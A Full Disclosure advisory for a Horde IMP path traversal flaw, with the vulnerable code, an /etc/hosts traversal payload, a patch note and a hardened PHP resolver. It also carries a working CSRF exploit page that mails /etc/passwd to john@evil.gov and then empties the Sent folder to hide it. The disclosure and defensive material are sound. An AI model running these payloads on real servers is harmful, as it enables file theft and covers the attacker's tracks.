Full Disclosure mailing list archives

[fulldis] CVE-2026-58451 - Horde Groupware IMP path traversal vuln


From: evan via Fulldisclosure <fulldisclosure@seclists.org>
Date: Fri, 3 Jul 2026 03:04:19 +1000

This is my first time sending to a mailing list, so I've chosen
something easy. Here goes:

Summary: Horde Groupware’s IMP Webmail solution contains a path
traversal/local file inclusion vulnerability which could be exploited
to escalate privileges or bypass authentication (through CSRF if
unauthenticated).

The vulnerability is here:

} elseif (strcasecmp($node->tagName, 'IMG') === 0) {
    /* Check for smileys. They live in the JS directory, under
     * the base ckeditor directory, so search for that and replace
     * with the filesystem information if found (Request
     * #13051). Need to ignore other image links that may have
     * been explicitly added by the user. */
    $js_path = strval(Horde::url($registry->get('jsuri', 'horde'), true));
    if (stripos($src, $js_path . '/ckeditor') === 0) {
        $file = str_replace(
            $js_path,
            $registry->get('jsfs', 'horde'),
            $src
        );

        if (is_readable($file)) {
            $data_part = new Horde_Mime_Part();
            $data_part->setContents(file_get_contents($file));
            ...

As seen, we control $file, which is just the src in <img src="">. To
get past the checks and reach the file_get_contents sink, we just need
to satisfy the stripos check. Our (elementary) exploit is thus:
--
<img src="https://webmail.foo.com/js/ckeditor/../../../../../../etc/hosts">
--
This is likely very chainable with any other existing primitive to
achieve RCE on Horde IMP. For example, here's an easy CSRF chain:

--
<!DOCTYPE html>
<html>

<body>
    <h1>yo</h1>
    <script>
        var p1 = new FormData();
        p1.append('to', 'john@evil.gov');
        // land in spam
        p1.append('subject', 'hai');
        p1.append('html', '1');
        p1.append('message',
            '<html><body>bye<img src="http://targ/horde/js/ckeditor/../../../../etc/passwd"></body></html>');

        p1.append('identity', '0');
        p1.append('priority', 'normal');
        p1.append('request_read_receipt', '0');
        p1.append('save_sent_mail', '1');
        fetch('http://targ/horde/services/ajax.php/imp/sendMessage', {
                method: 'POST',
                body: p1,
                credentials: 'include',
                mode: 'no-cors'
            })
            .then(() => {
                console.log("* bye");
                setTimeout(() => {
                    var p2 = new FormData();
                    p2.append('mbox', 'U0VOVA'); // b64 SENT
                    // delete
                    fetch('http://targ/horde/services/ajax.php/imp/emptyMailbox', {
                        method: 'POST',
                        body: p2,
                        credentials: 'include',
                        mode: 'no-cors'
                    });
                }, 2000);
            });
    </script>
</body>

</html>
--

PATCH:
Update to Horde IMP 7.0.1 for the patch.
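As an added example (not Horde's code, and not its actual patch), here is the prefix-only check from the snippet above next to a hardened resolver that canonicalises the path with realpath() and confines it to the ckeditor directory. $js_path, $js_fs, the temp directory and the function names are constructed for the demo.

```php
<?php
// Added example, not Horde's code or its patch. $js_path / $js_fs stand in
// for the 'jsuri' / 'jsfs' registry values; the temp directory is constructed.
$js_path = 'https://webmail.example/js';
$js_fs   = sys_get_temp_dir() . '/horde-js-demo';
@mkdir("$js_fs/ckeditor/smiley", 0700, true);
file_put_contents("$js_fs/ckeditor/smiley/smile.gif", 'GIF89a');

// Vulnerable shape from the advisory: only the URL prefix is checked, so any
// "../" after it walks the resulting filesystem path out of $js_fs.
function resolve_vulnerable(string $src, string $js_path, string $js_fs): ?string
{
    if (stripos($src, $js_path . '/ckeditor') !== 0) {
        return null;
    }
    $file = str_replace($js_path, $js_fs, $src);
    return is_readable($file) ? $file : null;
}

// Hardened: canonicalise with realpath() and require the result to stay
// inside the ckeditor directory. realpath() returns false for paths that
// do not exist, so a traversal to a missing file fails closed as well.
function resolve_hardened(string $src, string $js_path, string $js_fs): ?string
{
    if (stripos($src, $js_path . '/ckeditor/') !== 0) {
        return null;
    }
    $base = realpath($js_fs . '/ckeditor');
    $real = realpath($js_fs . '/' . substr($src, strlen($js_path) + 1));
    if ($base === false || $real === false) {
        return null;
    }
    // Compare with a trailing separator so "/ckeditor-x" cannot pass as "/ckeditor".
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return is_readable($real) ? $real : null;
}

$benign    = $js_path . '/ckeditor/smiley/smile.gif';
$traversal = $js_path . '/ckeditor/../../../../../../etc/hosts';

// The vulnerable resolver accepts both inputs; the hardened one still
// accepts the smiley but rejects the traversal because it leaves $base.
var_dump(resolve_vulnerable($benign, $js_path, $js_fs));
var_dump(resolve_vulnerable($traversal, $js_path, $js_fs));
var_dump(resolve_hardened($benign, $js_path, $js_fs));
var_dump(resolve_hardened($traversal, $js_path, $js_fs));
```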